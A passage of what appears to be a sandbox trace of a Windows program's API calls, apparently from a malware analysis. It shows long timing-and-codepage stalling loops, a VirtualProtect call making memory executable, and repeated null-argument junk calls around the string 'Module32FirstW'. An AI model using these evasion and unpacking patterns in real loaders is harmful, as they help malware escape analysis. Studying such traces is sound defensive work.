lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.368] GetACP () returned 0x4e4 [0078.368] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.369] GetACP () returned 0x4e4 [0078.369] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.370] GetACP () returned 0x4e4 [0078.370] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.371] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.371] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.372] GetACP () returned 0x4e4 [0078.372] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.373] GetACP () returned 0x4e4 [0078.373] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.374] GetACP () returned 0x4e4 [0078.374] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.375] GetACP () returned 0x4e4 [0078.375] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.375] GetACP () returned 0x4e4 [0078.375] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0078.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0078.375] GetACP () returned 0x4e4 [0078.833] VirtualProtect (in: lpAddress=0x5f5aa8, dwSize=0xfacb, flNewProtect=0x40, lpflOldProtect=0x43bc04 | out: lpflOldProtect=0x43bc04*=0x4) returned 1 [0078.833] AddAtomA (lpString=0x0) returned 0x0 [0078.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.834] AddAtomA (lpString=0x0) returned 0x0 [0078.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.834] AddAtomA (lpString=0x0) returned 0x0 [0078.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.834] AddAtomA (lpString=0x0) returned 0x0 [0078.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.834] AddAtomA (lpString=0x0) returned 0x0 [0078.834] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.834] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.834] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.835] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.835] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.835] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.835] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.835] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.835] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.835] AddAtomA (lpString=0x0) returned 0x0 [0078.835] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.836] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.836] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.836] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.837] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.837] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.837] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.837] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.837] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.837] AddAtomA (lpString=0x0) returned 0x0 [0078.837] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.837] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.838] AddAtomA (lpString=0x0) returned 0x0 [0078.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.838] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.838] AddAtomA (lpString=0x0) returned 0x0 [0078.838] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.838] 